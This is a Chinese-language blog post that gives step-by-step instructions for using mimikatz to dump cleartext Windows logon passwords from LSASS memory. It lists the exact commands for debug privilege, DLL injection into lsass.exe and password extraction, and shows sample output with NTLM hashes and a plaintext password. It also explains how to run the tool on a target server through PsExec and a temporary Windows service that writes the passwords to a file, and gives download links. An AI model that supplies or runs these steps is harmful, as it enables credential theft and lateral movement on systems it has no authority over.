获取Windows系统明文密码神器

今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:

注:使用前需确定自身系统是x86还是x64

本人测试环境:windows 2003

密码长度:8位

进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,

1、mimikatz # privilege::debug

2、mimikatz # inject::process lsass.exe sekurlsa.dll

3、mimikatz # @getLogonPasswords

Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 这里就是密码
我测试的时候还能看到历史密码。比较牛x的神器!

经网络众人分析,支持系统如下:

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

XP有些系统版本会出现拒绝访问。

在远程终端中运行该程序部分会提示:”存储空间不足,无法处理此命令”。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

//最简单实用的方法,使用 PsExec.exe 启动。
//在本机启动交互式命令提示窗口
psexec

psexec -s  c:\mimikatz\mimikatz.exe

//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit
//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword

 

原下载地址:http://blog.gentilkiwi.com/mimikatz

原文地址:http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

参考地址:http://lcx.cc/?FoxNews=2265.html

本地下载地址:http://jafee.net/Soft/Hack/mimikatz.rar

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值